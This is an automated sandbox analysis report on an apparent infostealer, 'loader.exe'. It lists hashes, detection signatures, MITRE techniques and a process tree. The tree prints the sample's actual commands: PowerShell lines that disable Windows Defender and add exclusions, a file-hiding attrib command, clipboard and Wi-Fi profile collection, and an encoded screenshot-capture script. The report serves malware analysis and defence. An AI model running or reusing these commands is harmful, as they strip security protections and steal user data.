8a38bb293557b9ee3ba0c376d076acc70f70653277af8b3e526b248fc2977c58

Analysis

max time kernel
142s
max time network
131s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
04/06/2024, 22:07

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

loader.exe
Size

6.3MB
MD5

cd64ae92771aae3022ed1186be571d9e
SHA1

0e0357d32f4a3d564600e56748111547976cb2b9
SHA256

8a38bb293557b9ee3ba0c376d076acc70f70653277af8b3e526b248fc2977c58
SHA512

916ca758955e6b58d6a201af025e45a026445c66c4e171533687a1961d3e57397eaff08496f9719d0b63c4cd2b05fe4018aa0630a1665c91561beff2b643616c
SSDEEP

98304:VQ9Wp75YthUQccRacg/BGfO1q4HNK0zbup/xzcq8zAFPjv9JT1sOBN3o1Sh:d55e6QraRRnz+R8zmPf1D7Jh

Score

8^/10

execution spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4932	powershell.exe
3620	powershell.exe
4828	powershell.exe

ACProtect 1.3x - 1.4x DLL software 16 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral2/files/0x0007000000023400-21.dat	acprotect
behavioral2/files/0x00070000000233f3-27.dat	acprotect
behavioral2/files/0x00070000000233fe-29.dat	acprotect
behavioral2/files/0x00070000000233fa-46.dat	acprotect
behavioral2/files/0x00070000000233f9-45.dat	acprotect
behavioral2/files/0x00070000000233f8-44.dat	acprotect
behavioral2/files/0x00070000000233f7-43.dat	acprotect
behavioral2/files/0x00070000000233f6-42.dat	acprotect
behavioral2/files/0x00070000000233f5-41.dat	acprotect
behavioral2/files/0x00070000000233f4-40.dat	acprotect
behavioral2/files/0x00070000000233f2-39.dat	acprotect
behavioral2/files/0x0007000000023405-38.dat	acprotect
behavioral2/files/0x0007000000023404-37.dat	acprotect
behavioral2/files/0x0007000000023403-36.dat	acprotect
behavioral2/files/0x00070000000233ff-33.dat	acprotect
behavioral2/files/0x00070000000233fd-32.dat	acprotect

Executes dropped EXE 1 IoCs

pid	Process
368	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2448	loader.exe
2448	loader.exe
2448	loader.exe
2448	loader.exe
2448	loader.exe
2448	loader.exe
2448	loader.exe
2448	loader.exe
2448	loader.exe
2448	loader.exe
2448	loader.exe
2448	loader.exe
2448	loader.exe
2448	loader.exe
2448	loader.exe
2448	loader.exe
2448	loader.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x0007000000023400-21.dat	upx
behavioral2/memory/2448-25-0x00000000752F0000-0x0000000075800000-memory.dmp	upx
behavioral2/files/0x00070000000233f3-27.dat	upx
behavioral2/files/0x00070000000233fe-29.dat	upx
behavioral2/files/0x00070000000233fa-46.dat	upx
behavioral2/memory/2448-48-0x0000000075290000-0x000000007529D000-memory.dmp	upx
behavioral2/files/0x00070000000233f9-45.dat	upx
behavioral2/files/0x00070000000233f8-44.dat	upx
behavioral2/files/0x00070000000233f7-43.dat	upx
behavioral2/files/0x00070000000233f6-42.dat	upx
behavioral2/files/0x00070000000233f5-41.dat	upx
behavioral2/files/0x00070000000233f4-40.dat	upx
behavioral2/files/0x00070000000233f2-39.dat	upx
behavioral2/files/0x0007000000023405-38.dat	upx
behavioral2/files/0x0007000000023404-37.dat	upx
behavioral2/files/0x0007000000023403-36.dat	upx
behavioral2/files/0x00070000000233ff-33.dat	upx
behavioral2/files/0x00070000000233fd-32.dat	upx
behavioral2/memory/2448-47-0x00000000752A0000-0x00000000752BE000-memory.dmp	upx
behavioral2/memory/2448-54-0x0000000075260000-0x0000000075287000-memory.dmp	upx
behavioral2/memory/2448-58-0x0000000075220000-0x000000007523B000-memory.dmp	upx
behavioral2/memory/2448-57-0x0000000075240000-0x0000000075258000-memory.dmp	upx
behavioral2/memory/2448-60-0x00000000750E0000-0x0000000075217000-memory.dmp	upx
behavioral2/memory/2448-72-0x0000000074C00000-0x0000000074F8C000-memory.dmp	upx
behavioral2/memory/2448-71-0x0000000074F90000-0x0000000075039000-memory.dmp	upx
behavioral2/memory/2448-70-0x0000000075040000-0x000000007506C000-memory.dmp	upx
behavioral2/memory/2448-69-0x00000000752F0000-0x0000000075800000-memory.dmp	upx
behavioral2/memory/2448-64-0x0000000075070000-0x000000007507C000-memory.dmp	upx
behavioral2/memory/2448-63-0x00000000750C0000-0x00000000750D6000-memory.dmp	upx
behavioral2/memory/2448-77-0x0000000074B80000-0x0000000074B8C000-memory.dmp	upx
behavioral2/memory/2448-81-0x00000000752A0000-0x00000000752BE000-memory.dmp	upx
behavioral2/memory/2448-82-0x0000000074A60000-0x0000000074B78000-memory.dmp	upx
behavioral2/memory/2448-76-0x0000000074B90000-0x0000000074BA0000-memory.dmp	upx
behavioral2/memory/2448-329-0x00000000752F0000-0x0000000075800000-memory.dmp	upx
behavioral2/memory/2448-339-0x0000000074F90000-0x0000000075039000-memory.dmp	upx
behavioral2/memory/2448-340-0x0000000074C00000-0x0000000074F8C000-memory.dmp	upx
behavioral2/memory/2448-338-0x0000000075040000-0x000000007506C000-memory.dmp	upx
behavioral2/memory/2448-336-0x00000000750C0000-0x00000000750D6000-memory.dmp	upx
behavioral2/memory/2448-335-0x00000000750E0000-0x0000000075217000-memory.dmp	upx
behavioral2/memory/2448-334-0x0000000075220000-0x000000007523B000-memory.dmp	upx
behavioral2/memory/2448-330-0x00000000752A0000-0x00000000752BE000-memory.dmp	upx
behavioral2/memory/2448-382-0x00000000752A0000-0x00000000752BE000-memory.dmp	upx
behavioral2/memory/2448-388-0x00000000750C0000-0x00000000750D6000-memory.dmp	upx
behavioral2/memory/2448-395-0x0000000074A60000-0x0000000074B78000-memory.dmp	upx
behavioral2/memory/2448-394-0x0000000074C00000-0x0000000074F8C000-memory.dmp	upx
behavioral2/memory/2448-393-0x0000000074B90000-0x0000000074BA0000-memory.dmp	upx
behavioral2/memory/2448-392-0x0000000074B80000-0x0000000074B8C000-memory.dmp	upx
behavioral2/memory/2448-391-0x0000000074F90000-0x0000000075039000-memory.dmp	upx
behavioral2/memory/2448-390-0x0000000075040000-0x000000007506C000-memory.dmp	upx
behavioral2/memory/2448-389-0x00000000750E0000-0x0000000075217000-memory.dmp	upx
behavioral2/memory/2448-387-0x00000000752F0000-0x0000000075800000-memory.dmp	upx
behavioral2/memory/2448-386-0x0000000075070000-0x000000007507C000-memory.dmp	upx
behavioral2/memory/2448-385-0x0000000075240000-0x0000000075258000-memory.dmp	upx
behavioral2/memory/2448-384-0x0000000075260000-0x0000000075287000-memory.dmp	upx
behavioral2/memory/2448-383-0x0000000075290000-0x000000007529D000-memory.dmp	upx
behavioral2/memory/2448-381-0x0000000075220000-0x000000007523B000-memory.dmp	upx

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
27	discord.com
26	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
20	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3244	WMIC.exe

Enumerates processes with tasklist 1 TTPs 3 IoCs

Process Discovery

T1057

pid	Process
1192	tasklist.exe
4728	tasklist.exe
4796	tasklist.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3392	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
5000	PING.EXE

Suspicious behavior: EnumeratesProcesses 24 IoCs

pid	Process
5016	powershell.exe
5016	powershell.exe
4932	powershell.exe
4932	powershell.exe
3620	powershell.exe
3620	powershell.exe
5016	powershell.exe
4596	powershell.exe
4596	powershell.exe
4828	powershell.exe
4828	powershell.exe
4932	powershell.exe
3620	powershell.exe
4596	powershell.exe
4828	powershell.exe
3684	powershell.exe
3684	powershell.exe
3684	powershell.exe
2644	powershell.exe
2644	powershell.exe
3620	powershell.exe
3620	powershell.exe
4884	powershell.exe
4884	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4728	tasklist.exe
Token: SeDebugPrivilege	4796	tasklist.exe
Token: SeDebugPrivilege	5016	powershell.exe
Token: SeDebugPrivilege	4932	powershell.exe
Token: SeDebugPrivilege	3620	powershell.exe
Token: SeIncreaseQuotaPrivilege	3852	WMIC.exe
Token: SeSecurityPrivilege	3852	WMIC.exe
Token: SeTakeOwnershipPrivilege	3852	WMIC.exe
Token: SeLoadDriverPrivilege	3852	WMIC.exe
Token: SeSystemProfilePrivilege	3852	WMIC.exe
Token: SeSystemtimePrivilege	3852	WMIC.exe
Token: SeProfSingleProcessPrivilege	3852	WMIC.exe
Token: SeIncBasePriorityPrivilege	3852	WMIC.exe
Token: SeCreatePagefilePrivilege	3852	WMIC.exe
Token: SeBackupPrivilege	3852	WMIC.exe
Token: SeRestorePrivilege	3852	WMIC.exe
Token: SeShutdownPrivilege	3852	WMIC.exe
Token: SeDebugPrivilege	3852	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3852	WMIC.exe
Token: SeRemoteShutdownPrivilege	3852	WMIC.exe
Token: SeUndockPrivilege	3852	WMIC.exe
Token: SeManageVolumePrivilege	3852	WMIC.exe
Token: 33	3852	WMIC.exe
Token: 34	3852	WMIC.exe
Token: 35	3852	WMIC.exe
Token: 36	3852	WMIC.exe
Token: SeDebugPrivilege	1192	tasklist.exe
Token: SeDebugPrivilege	4596	powershell.exe
Token: SeIncreaseQuotaPrivilege	3852	WMIC.exe
Token: SeSecurityPrivilege	3852	WMIC.exe
Token: SeTakeOwnershipPrivilege	3852	WMIC.exe
Token: SeLoadDriverPrivilege	3852	WMIC.exe
Token: SeSystemProfilePrivilege	3852	WMIC.exe
Token: SeSystemtimePrivilege	3852	WMIC.exe
Token: SeProfSingleProcessPrivilege	3852	WMIC.exe
Token: SeIncBasePriorityPrivilege	3852	WMIC.exe
Token: SeCreatePagefilePrivilege	3852	WMIC.exe
Token: SeBackupPrivilege	3852	WMIC.exe
Token: SeRestorePrivilege	3852	WMIC.exe
Token: SeShutdownPrivilege	3852	WMIC.exe
Token: SeDebugPrivilege	3852	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3852	WMIC.exe
Token: SeRemoteShutdownPrivilege	3852	WMIC.exe
Token: SeUndockPrivilege	3852	WMIC.exe
Token: SeManageVolumePrivilege	3852	WMIC.exe
Token: 33	3852	WMIC.exe
Token: 34	3852	WMIC.exe
Token: 35	3852	WMIC.exe
Token: 36	3852	WMIC.exe
Token: SeDebugPrivilege	4828	powershell.exe
Token: SeDebugPrivilege	3684	powershell.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeIncreaseQuotaPrivilege	740	WMIC.exe
Token: SeSecurityPrivilege	740	WMIC.exe
Token: SeTakeOwnershipPrivilege	740	WMIC.exe
Token: SeLoadDriverPrivilege	740	WMIC.exe
Token: SeSystemProfilePrivilege	740	WMIC.exe
Token: SeSystemtimePrivilege	740	WMIC.exe
Token: SeProfSingleProcessPrivilege	740	WMIC.exe
Token: SeIncBasePriorityPrivilege	740	WMIC.exe
Token: SeCreatePagefilePrivilege	740	WMIC.exe
Token: SeBackupPrivilege	740	WMIC.exe
Token: SeRestorePrivilege	740	WMIC.exe
Token: SeShutdownPrivilege	740	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 400 wrote to memory of 2448	400	loader.exe	82
PID 400 wrote to memory of 2448	400	loader.exe	82
PID 400 wrote to memory of 2448	400	loader.exe	82
PID 2448 wrote to memory of 4084	2448	loader.exe	86
PID 2448 wrote to memory of 4084	2448	loader.exe	86
PID 2448 wrote to memory of 4084	2448	loader.exe	86
PID 2448 wrote to memory of 1936	2448	loader.exe	87
PID 2448 wrote to memory of 1936	2448	loader.exe	87
PID 2448 wrote to memory of 1936	2448	loader.exe	87
PID 2448 wrote to memory of 824	2448	loader.exe	88
PID 2448 wrote to memory of 824	2448	loader.exe	88
PID 2448 wrote to memory of 824	2448	loader.exe	88
PID 2448 wrote to memory of 4916	2448	loader.exe	92
PID 2448 wrote to memory of 4916	2448	loader.exe	92
PID 2448 wrote to memory of 4916	2448	loader.exe	92
PID 2448 wrote to memory of 4896	2448	loader.exe	94
PID 2448 wrote to memory of 4896	2448	loader.exe	94
PID 2448 wrote to memory of 4896	2448	loader.exe	94
PID 2448 wrote to memory of 4316	2448	loader.exe	95
PID 2448 wrote to memory of 4316	2448	loader.exe	95
PID 2448 wrote to memory of 4316	2448	loader.exe	95
PID 824 wrote to memory of 1232	824	cmd.exe	98
PID 824 wrote to memory of 1232	824	cmd.exe	98
PID 824 wrote to memory of 1232	824	cmd.exe	98
PID 1936 wrote to memory of 5016	1936	cmd.exe	99
PID 1936 wrote to memory of 5016	1936	cmd.exe	99
PID 1936 wrote to memory of 5016	1936	cmd.exe	99
PID 4316 wrote to memory of 4728	4316	cmd.exe	100
PID 4316 wrote to memory of 4728	4316	cmd.exe	100
PID 4316 wrote to memory of 4728	4316	cmd.exe	100
PID 2448 wrote to memory of 4116	2448	loader.exe	101
PID 2448 wrote to memory of 4116	2448	loader.exe	101
PID 2448 wrote to memory of 4116	2448	loader.exe	101
PID 2448 wrote to memory of 3900	2448	loader.exe	102
PID 2448 wrote to memory of 3900	2448	loader.exe	102
PID 2448 wrote to memory of 3900	2448	loader.exe	102
PID 2448 wrote to memory of 1564	2448	loader.exe	103
PID 2448 wrote to memory of 1564	2448	loader.exe	103
PID 2448 wrote to memory of 1564	2448	loader.exe	103
PID 4896 wrote to memory of 4796	4896	cmd.exe	104
PID 4896 wrote to memory of 4796	4896	cmd.exe	104
PID 4896 wrote to memory of 4796	4896	cmd.exe	104
PID 2448 wrote to memory of 4952	2448	loader.exe	105
PID 2448 wrote to memory of 4952	2448	loader.exe	105
PID 2448 wrote to memory of 4952	2448	loader.exe	105
PID 2448 wrote to memory of 1844	2448	loader.exe	107
PID 2448 wrote to memory of 1844	2448	loader.exe	107
PID 2448 wrote to memory of 1844	2448	loader.exe	107
PID 2448 wrote to memory of 3244	2448	loader.exe	109
PID 2448 wrote to memory of 3244	2448	loader.exe	109
PID 2448 wrote to memory of 3244	2448	loader.exe	109
PID 2448 wrote to memory of 4072	2448	loader.exe	112
PID 2448 wrote to memory of 4072	2448	loader.exe	112
PID 2448 wrote to memory of 4072	2448	loader.exe	112
PID 4084 wrote to memory of 4932	4084	cmd.exe	116
PID 4084 wrote to memory of 4932	4084	cmd.exe	116
PID 4084 wrote to memory of 4932	4084	cmd.exe	116
PID 4916 wrote to memory of 3620	4916	cmd.exe	117
PID 4916 wrote to memory of 3620	4916	cmd.exe	117
PID 4916 wrote to memory of 3620	4916	cmd.exe	117
PID 4116 wrote to memory of 3852	4116	cmd.exe	119
PID 4116 wrote to memory of 3852	4116	cmd.exe	119
PID 4116 wrote to memory of 3852	4116	cmd.exe	119
PID 1844 wrote to memory of 5032	1844	cmd.exe	120

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1232	attrib.exe

C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:400
- C:\Users\Admin\AppData\Local\Temp\loader.exe
  "C:\Users\Admin\AppData\Local\Temp\loader.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2448
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4084
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4932
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1936
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5016
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\loader.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:824
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\loader.exe"
      4⤵
      Views/modifies file attributes
      PID:1232
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4916
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ‏ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3620
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4896
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4796
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4316
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4728
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4116
  - - C:\Windows\SysWOW64\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3852
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    PID:3900
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4596
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:1564
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1192
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4952
  - - C:\Windows\SysWOW64\tree.com
      tree /A /F
      4⤵
      PID:1832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1844
  - - C:\Windows\SysWOW64\netsh.exe
      netsh wlan show profile
      4⤵
      PID:5032
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:3244
  - - C:\Windows\SysWOW64\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3392
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:4072
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbA